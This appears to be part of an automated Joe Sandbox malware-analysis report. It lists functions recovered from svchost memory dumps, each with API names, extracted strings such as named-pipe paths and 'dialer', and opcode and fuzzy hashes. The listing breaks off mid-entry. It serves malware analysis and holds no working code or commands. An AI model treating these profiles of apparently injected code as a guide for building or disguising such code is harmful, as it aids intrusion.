                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 195e277db55ff97f3f99f451c10649e3fcd3ec1e2be31b8428dbef89db2187c3
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: 12D17876205F8882DB71DB9AE4A439A77E1F388B84F500116EA8E97FA5DF3CC551CB40
                                                                          Function 00000195DD5C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: fc4c9099da629ec678108cb9cb41e40dfa530a30d66993f12becd6c4ba3f9dba
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: 0C317036702F5DC2E716DF9AE561BA977E2FB44B84F084020DE48A7F55EB34C4A18740
                                                                          Function 00000195DD5CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 8fdc15ff09e63732eb275527d3260f2eb5a265f6af426b64fb26ff3aadc1099c
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: C9115E34203E4882FB66A7AE59757B963C39B847B4F144725A836F6FD6EE6884428700
                                                                          Function 00000195DD5C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 094941dede99f9d048632fe007c60956db5d273133d38dce1c9db68577c35704
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: F4018C31300E4882EB11DB92A86879963E2F788FC1F884035DE4DA3B54DF3CC98AC750
                                                                          Function 00000195DD5C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: a4c37ed03e2153ec921c4fe35d3b930d694565bbf9533148a8bdd7b871a42841
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 00014075312F4882FF269BA6E82879573E2BB45B86F040424CE4967B54EF3DC149C710
                                                                          Function 00000195DD5C9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                          • Instruction ID: b6a9a57366d7e32ba7d8204e1a09c4ae5b67336b6113bd5d1bf03962d45849d0
                                                                          • Opcode Fuzzy Hash: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                          • Instruction Fuzzy Hash: FD51E732703A088AEB16CF59E469BD837D7F34AB89F518124DA06A3B8CDB75C841CB44
                                                                          Function 00000195DD5C8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 3343c703fad3ff3a8a0055ce76d4c8b5bb2113134d4bfc35ff936db91a6087cf
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 3931D132202A44C6E716DF5AE86879937E6F745BCAF058014EE46A7B8DDB39C941CB04
                                                                          Function 00000195DD5C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: df346fd54c246db8dc1c541bbdd1f0d6174768352badab0d676f886130502b32
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 2BF04432304A4592E7618BA5F8A479967E2F748BD8F844021DA4957E54DF3CC64ECB10
                                                                          Function 00000195DD5C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 9bf27a7e66860d5ed9a1e4fc62765c01fea6d54f0cf7a99623ebd25812deed3f
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: FFF01C75715F8882FB158F97B92419967E2AB48FD1F089131EE4A67F28DF3CC4868710
                                                                          Function 00000195DD5CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: 6fff49532d995f645c10438cf692a88e56ff7661239a114b43dcc12d8e254882
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 9BF09675311F0981EF118BA8E46439963E2EB857A1F540219CA6A56BE4DF3CC546C310
                                                                          Function 00000195DD5C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: a3c0edd0877988b553c5cb3f44ac1cf59b63286ea202ec1d8159712ba189bc8b
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 7402A83221AB8486E761CB99E4A479EB7E1F3C4794F104115EA8E97FA9DF7CC484CB00
                                                                          Function 00000195DD5C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: c54ef34d66bd00901bd8adbac774be78d0448155a515a9e92ef6434a46babdc8
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 5561EB3661AF48C6E761DB9AE46475AB7E2F388784F500115EA8E97FA8DB7CC440CF40
                                                                          Function 00000195DD5A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 33dfdcfffdc3893784a7b309723e3667eaa1db39b5b3fd1c14ced88943099ce3
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 0111E332A10F3141FBA691ECE4753E91AC36F5C37CF49A638A96626ED6CA2CF8405700
                                                                          Function 00000195DD5D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 4f18cf734432864d1cadb05385a9f61388192ac32121d651ae8f93e19ceaa8fb
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 38115132A10F9131FB6615E8D4763E611DB6B683F8F180724A97636FD68A24C8414721
                                                                          Function 00000195DD59F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: e363e31868ba0ebea0856da9f2af10226048556fbf55e11a4800ee541c068533
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 3261D53A600E40C2FB6BCBE4E9703EE2AE3E785780F554415CA5A37FA4DB34D8499B40
                                                                          Function 00000195DD5CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                          • Instruction ID: 14cf2eee4fbcc911eae32f8475549afe507b7b7c46814838016a04d8a23f088c
                                                                          • Opcode Fuzzy Hash: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                          • Instruction Fuzzy Hash: DD614932602A888AEB21DFA9D4503DD7BE2F354B8CF045215EF4967B98DB39D595C700
                                                                          Function 00000195DD59A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 630a7bd136e047a971954e7c30b8e6e87b54a1208c2d6339fb40a23e9a14be36
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 9351AA32100B80CAEF768BA5946439877E2F355BC4F189216DB99A7FD5CB3AD490CF10
                                                                          Function 00000195DD5CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 2a90534c08ec7fa08356974faa6f23fad74bcd69915b4cf882117b33a0582183
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: A451E076101B88CAEB768FA994A43D87BE2F355B85F184116DA89E7FD5CB39C490CB00
                                                                          Function 00000195DD598405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 545615c7cb5cd5622a5ac668a3e3931a1a855b43902fdb1261379489e8260ddb
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 5F51D132701A00DBEB56CF55E464B983BEAF354BA8F548164DA1A67B88EB35D844CF04
                                                                          Function 00000195DD5983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 1a57b68ce290c85dbce40ecbe3ad1d13c9711456f6542ae40eb2b2b77e126871
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 1F31DF32201B40EAE716DF61E864B997BEAF744BD8F058054EE5B67F88DB39D940CB04
                                                                          Function 00000195DD5D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                          • Instruction ID: f53c85bc1b1823a42c19dddbaacf5ef3270f7fc8b13c31205dca382023514cf5
                                                                          • Opcode Fuzzy Hash: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                          • Instruction Fuzzy Hash: 84D1FE32B15A8089E712CFB9D4607EC3BF2F755BA8F008216DE5AA7F99DA34C406C350
                                                                          Function 00000195DD5C14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: c16a99b6eb882b57aedd9fd2cb972f0c73c4406802b17b7f20f8a29f0fc28702
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 45015A32601F99D6E705DFE6E95418A77E2FB89F81F044425EA4A63B29DE38C052C750
                                                                          Function 00000195DD5D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                          • Instruction ID: d41248d40368a7dadbb8de4372f2d467b08f8f1214df69f873c535610b2736e1
                                                                          • Opcode Fuzzy Hash: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                          • Instruction Fuzzy Hash: 1D91CE32704E5499F7629FA994A0BED3BE2F754B88F144109DE4A77F98DB74C882C720
                                                                          Function 00000195DD5C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: ef2a4aaacd16aa62e41bbfaf996d134d739e1b6477f4088ce6822e44ce878a86
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 32113C36710F058AEB10DFA0E8643E833E4F719759F440E21DA6D96BA4DF78C1998380
                                                                          Function 00000195DD5C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                          • Instruction ID: 4b390bd35bc8d7488896d564d2b09490878af5546f8c74a14ac6cebee34a4a91
                                                                          • Opcode Fuzzy Hash: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                          • Instruction Fuzzy Hash: 9371B436301F8986E726DFAD98A47EA77D6F389B84F480026DD09A3F89DE39C545C700
                                                                          Function 00000195DD599E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 963f06e7ef80a2670a9323d7792bb0635a5f70e1dcd725eb12c0e0c54d3360cc
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: F4614636A00B84CAEB22DFA5D4903DD7BE2F349B88F045215EF4927B99DB38D595CB40
                                                                          Function 00000195DD5C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                          • Instruction ID: 6ad79f3c6496f576d1a9b3784531bf2f01e420446c3f4c2c03693f52336387d6
                                                                          • Opcode Fuzzy Hash: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                          • Instruction Fuzzy Hash: CB511632206B8982F736DBAEA0B87EA77D3F386740F480125DD49A3F49DA39C505C740
                                                                          Function 00000195DD5D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
